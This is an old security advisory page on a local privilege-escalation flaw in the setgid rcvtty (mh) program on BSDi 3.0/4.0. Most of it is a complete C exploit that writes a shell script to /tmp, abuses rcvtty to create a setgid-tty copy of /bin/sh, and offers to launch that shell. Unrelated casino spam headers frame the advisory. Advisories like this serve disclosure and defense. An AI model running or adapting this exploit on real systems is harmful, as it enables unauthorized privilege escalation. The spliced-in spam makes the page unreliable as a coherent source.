Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
27th Nov 2000 [SBWID-165]
COMMAND
	    rcvtty (mh)
SYSTEMS AFFECTED
	    BSDi 3.0/4.0
PROBLEM
	    Chris Sharp  found following.   Well, we  dont know  if rcvtty  is
	    supposed to be  setgid in general,  since we never  seen it setgid
	    on  anything  but  BSDi  3.0  and  4.0.   None-the-less, here is a
	    exploit Chris wrote for it:
	
	        http://realhalo.org/xrcvtty.c
	
	    xrcvtty.c (modified from original):
	
	    /* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
	       v9[[email protected]].  gives gid=4(tty).
	       info: found/exploit by: v9[[email protected]].
	    */
	    #define PATH      "/usr/contrib/mh/lib/rcvtty"
	    #define MAKESHELL "/tmp/mksh.sh"
	    #define SGIDSHELL "/tmp/ttysh"
	    #define GIDTTY    4
	    #include <stdio.h>
	    #include <sys/stat.h>
	    main(){
	     char cmd[256],in[0];
	     struct stat mod1,mod2;
	     FILE *sgidexec;
	     fprintf(stderr,"[ (BSDi3.0/4.0)rcvtty[mh] local"
	     " exploit, by v9[[email protected] ]. ]\n\n");
	     if(stat(PATH,&mod1)){
	      fprintf(stderr,"[!] failed, %s doesnt appear to"
	      " exist.\n",PATH);
	      exit(1);
	     }
	     else
	     if(mod1.st_mode==34285&&mod1.st_gid==GIDTTY){
	      fprintf(stderr,"[*] %s appears to be setgid"
	      " tty(%d).\n",PATH,GIDTTY);
	     }
	     else{
	      fprintf(stderr,"[!] failed, %s isn't setgid"
	      " tty(%d).\n",PATH,GIDTTY);
	      exit(1);
	     }
	     fprintf(stderr,"[*] now making shell script to"
	     " execute.\n");
	     unlink(MAKESHELL);
	     sgidexec=fopen(MAKESHELL,"w");
	     fprintf(sgidexec,"#!/bin/sh\n");
	     fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
	     fprintf(sgidexec,"chgrp %d"
	     " %s\n",GIDTTY,SGIDSHELL);
	     fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
	     fclose(sgidexec);
	     chmod(MAKESHELL,33261);
	     fprintf(stderr,"[*] done, now building and"
	     " executing the command line.\n");
	     snprintf(cmd,sizeof(cmd),"echo yes | %s %s"
	     " 1>/dev/null 2>&1",PATH,MAKESHELL);
	     system(cmd);
	     unlink(MAKESHELL);
	     fprintf(stderr,"[*] done, now checking for"
	     " success.\n");
	     if(stat(SGIDSHELL,&mod2)){
	      fprintf(stderr,"[!] failed, %s doesn't"
	      " exist.\n",SGIDSHELL);
	      exit(1);
	     }
	     else
	    if(mod2.st_mode==34285&&mod2.st_gid==GIDTTY){
	      fprintf(stderr,"[*] success, %s is now setgid"
	      " tty(%d).\n",SGIDSHELL,GIDTTY);
	     }
	     else{
	      fprintf(stderr,"[!] failed, %s isn't setgid"
	      " tty(%d).\n",SGIDSHELL,GIDTTY);
	      exit(1);
	     }
	     fprintf(stderr,"[*] finished, everything"
	     " appeared to have gone successful.\n");
	     fprintf(stderr,"[?] do you wish to enter the"
	     " sgidshell now(y/n)?: ");
	     scanf("%s",in);
	     if(in[0]!=0x59&&in[0]!=0x79){
	      printf("[*] ok, aborting execution, the shell"
	      " is: %s.\n",SGIDSHELL);
	     }
	     else{
	      printf("[*] ok, executing shell(%s) now.\n",
	      SGIDSHELL);
	      execl(SGIDSHELL,SGIDSHELL,0);
	     }
	     exit(0);
	    }
	
	    In nmh (mh's actively-maintained descendant), at least, rcvtty  is
	    not installed setgid.  Not sure if there's a BSD port of nmh  that
	    makes it so, though.
SOLUTION
	    Nothing yet.
Internet highlights

Casino Not On Gamstop